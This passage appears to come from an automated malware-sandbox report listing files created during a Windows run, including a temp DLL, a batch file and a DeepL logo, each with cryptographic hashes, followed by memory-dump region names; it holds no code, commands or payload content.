  SHA512: 0120c1f3c501c0630c931f873794f6c7ef1e87216b95aaf76479dfff1614020a7de38c62a24f92a82ae1b0a55b041308d24390b6f556c62d535bef938e4f6974
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 7224298af316ab030a6ea7b29e69915d
  SHA1: c73b3f8af0647472461d4746f9edf2153b754bd0
  SHA256: c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87
  SHA512: 5ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099
- C:\Users\Admin\AppData\Local\Temp\0397ase.dll
  Filesize: 702KB
  MD5: 9b692f43d575acb739decfc809db7f2e
  SHA1: bc42c60590cb908e765e2d97e8b3a92b4616cd30
  SHA256: 0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
  SHA512: f99f546940bd96c6e9cac6a8500f25280ed190b9830247a5c7249d30a40fd1b4e3c94ca0455e337e77682a7a2b14a259b0aa4cf9680e9ccf727f71ae69873473
- C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svg
  Filesize: 1KB
  MD5: 777a20dc2f64eeb9195fb25113a3e7ac
  SHA1: d6f8ffdd1f8caad4a978e621ae344a9fa5ba0313
  SHA256: 71df5c84f31125f2f585a82489a570efb6fb371c6ca2b8c1deabca4463e601ba
  SHA512: 216020d3f7325e717113ac85729cbbf99286c26124b2f7e422271867870a96eeb35548b91a1aee89cd8ff1102c526fe8fb1842ef408b18801673d17d418b8595
- C:\Users\Admin\AppData\Local\Temp\lxpwR.bat
  Filesize: 714B
  MD5: c89f63062141bea640be6864ba85f57f
  SHA1: dce355e580893996f4df0753785f975fb7801d7e
  SHA256: 28770f2c402d52622b2a1ce5ee07aeb75071196a3699054af780766b6a3b1125
  SHA512: 773ec4a25afc690f2be3816544fe7718631c28be5d53c3b255b3466db270338f01829d1bd841536ef59d5f973e0eaf3e8a20fa8f22da9c137a295761d5da862b
- \??\pipe\LOCAL\crashpad_1544_JVLPPMHJQQBPALHY
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- memory/1020-164-0x0000000000000000-mapping.dmp
- memory/1264-138-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmp (Filesize: 10.8MB)
- memory/1264-135-0x0000000000000000-mapping.dmp
- memory/1312-153-0x0000000000000000-mapping.dmp
- memory/1324-182-0x0000000000000000-mapping.dmp
- memory/1452-140-0x0000000000000000-mapping.dmp
- memory/1544-139-0x0000000000000000-mapping.dmp
- memory/1888-169-0x0000000000000000-mapping.dmp
- memory/2160-185-0x0000000000000000-mapping.dmp
- memory/2820-155-0x0000000000000000-mapping.dmp
- memory/2996-170-0x0000000000000000-mapping.dmp
- memory/3200-160-0x00007FFA0DD10000-0x00007FFA0E7D1000-memory.dmp (Filesize: 10.8MB)
- memory/3200-158-0x0000000000000000-mapping.dmp
- memory/3216-166-0x0000000000000000-mapping.dmp
- memory/3252-173-0x0000000180000000-0x0000000180009000-memory.dmp (Filesize: 36KB)
- memory/3576-167-0x0000000000000000-mapping.dmp
- memory/3684-143-0x0000000000000000-mapping.dmp
- memory/3792-142-0x0000000000000000-mapping.dmp
- memory/3968-162-0x0000000000000000-mapping.dmp
- memory/4300-131-0x000002ABC07A0000-0x000002ABC07C2000-memory.dmp (Filesize: 136KB)
- memory/4300-133-0x00007FFA0E470000-0x00007FFA0EF31000-memory.dmp (Filesize: 10.8MB)
- memory/4300-130-0x0000000000000000-mapping.dmp
- memory/4432-145-0x0000000000000000-mapping.dmp
- memory/4440-180-0x0000000000000000-mapping.dmp
- memory/4516-168-0x0000000000000000-mapping.dmp
- memory/4544-154-0x0000000000000000-mapping.dmp
- memory/4772-148-0x0000000000000000-mapping.dmp
- memory/4776-150-0x0000000000000000-mapping.dmp
- memory/5012-132-0x0000000000000000-mapping.dmp
- memory/5040-157-0x0000000000000000-mapping.dmp
- memory/5108-183-0x0000000000000000-mapping.dmp